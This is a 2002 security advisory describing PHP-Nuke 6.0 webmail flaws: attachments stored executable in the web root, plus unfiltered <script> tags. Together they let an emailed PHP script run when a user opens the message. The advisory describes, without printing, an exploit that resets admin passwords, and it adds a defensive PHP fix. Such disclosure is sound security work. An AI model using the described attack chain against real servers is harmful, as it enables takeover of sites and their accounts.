
PHP-Nuke code execution and XSS vulnerabilities
17th Dec 2002 [SBWID-5884]
COMMAND

	PHP-Nuke code execution and XSS vulnerabilities

SYSTEMS AFFECTED

	PHP-Nuke 6.0

PROBLEM

	Thanks to Ulf Harnhammar's [ulfh@update.uu.se] advisory:
	
	--snip--
	
	PHP-Nuke has got a web mail system,  and  it  stores  attachments  under
	their real file names in a directory where anyone can surf to them.
	
	There is nothing in the code that stops  active  content,  such  as  PHP
	scripts, from being stored in that directory. There is also  no  warning
	against this in the program's documentation. As a result,  any  attacker
	can execute any PHP script on the web server. The attacker  first  sends
	the script as an attachment to any user who will read  that  message  in
	PHP-Nuke's web mail system. The attacker then  waits  for  the  user  to
	open the message, and finally the attacker just surfs to  a  predictable
	WWW location. The user doesn't even have to open  the  attachment,  just
	the mail that it comes in.
	
	As a bonus,  the  web  mail  system  also  has  a  Cross-Site  Scripting
	vulnerability. It doesn't remove <script> tags in HTML  based  e-mail
	messages.
	
	
	When we combine the two vulnerabilities, we find that it is possible  to
	construct an e-mail message that will automatically execute an  attached
	PHP script when an unsuspecting user opens that message!
	
	This is very bad,  as  PHP  scripts  can  access  files,  databases  and
	network resources. They can for instance  store  a  C  program  in  some
	temporary location, compile it and execute it.
	
	To make things even worse, the availability of anonymous  remailers  and
	the fact that the PHP script will  be  accessed  from  the  victim's  IP
	number and not the attacker's makes the attacker pretty anonymous.
	
	--snap--
	
	 EXPLOIT:
	 ========
	
	I have also attached an  exploit  for  this  issue,  which  changes  all
	administrator passwords on the PHP-Nuke system to  "ulf".  The  attacker
	simply sends an HTML mail with the contents of my xss.html file  as  the
	*mail body* and my adminexploit.php file as an attachment.  As  soon  as
	the victim opens the mail, the script is executed.
	
	

SOLUTION

	No official patch yet
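	Pending a fix, the two weaknesses described above (attachments stored under their client-supplied names inside the web root, and HTML bodies rendered with script content intact) can be closed in the web mail module itself. The following is an added example written for this page, not PHP-Nuke's own code nor the author's patch; ATTACH_DIR is an assumed placeholder for a directory outside the document root.

```php
<?php
// Added example (not PHP-Nuke code). ATTACH_DIR is a placeholder: it must
// be outside DocumentRoot so the web server can never hand a stored file
// to the PHP interpreter, whatever the sender called it.
declare(strict_types=1);

const ATTACH_DIR = '/var/lib/webmail/attachments'; // placeholder path

// Store raw attachment bytes under an opaque, server-chosen name.
// The sender's filename is kept only as display metadata, so neither its
// extension (.php) nor any traversal sequence ever reaches the filesystem.
function storeAttachment(string $clientName, string $bytes, string $dir = ATTACH_DIR): array
{
    $id   = bin2hex(random_bytes(16));              // unguessable, no extension
    $path = $dir . DIRECTORY_SEPARATOR . $id;
    if (file_put_contents($path, $bytes, LOCK_EX) === false) {
        throw new RuntimeException('attachment write failed');
    }
    chmod($path, 0600);                             // data only, never executable
    return ['id' => $id, 'name' => basename($clientName), 'size' => strlen($bytes)];
}

// Serve a stored attachment as an opaque download. The id is validated
// against the exact shape storeAttachment() produces, so no other path
// under the directory (or outside it) can be requested.
function sendAttachment(string $id, string $displayName, string $dir = ATTACH_DIR): void
{
    if (!preg_match('/^[a-f0-9]{32}$/', $id)) { http_response_code(404); return; }
    $path = $dir . DIRECTORY_SEPARATOR . $id;
    if (!is_file($path))                          { http_response_code(404); return; }
    $safeName = preg_replace('/[^\w.\-]/', '_', $displayName); // no quotes/CRLF in header
    header('Content-Type: application/octet-stream');
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: attachment; filename="' . $safeName . '"');
    readfile($path);
}

// Display an HTML mail body as text rather than as markup. Escaping every
// tag (instead of trying to strip <script> alone) removes the cross-site
// scripting vector that let a message trigger a fetch of the attachment.
function renderMailBody(string $html): string
{
    return nl2br(htmlspecialchars($html, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'));
}
```

	With attachments reachable only through sendAttachment(), the "predictable WWW location" the advisory relies on no longer exists, and the escaped body cannot direct a reader's browser anywhere on its own.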
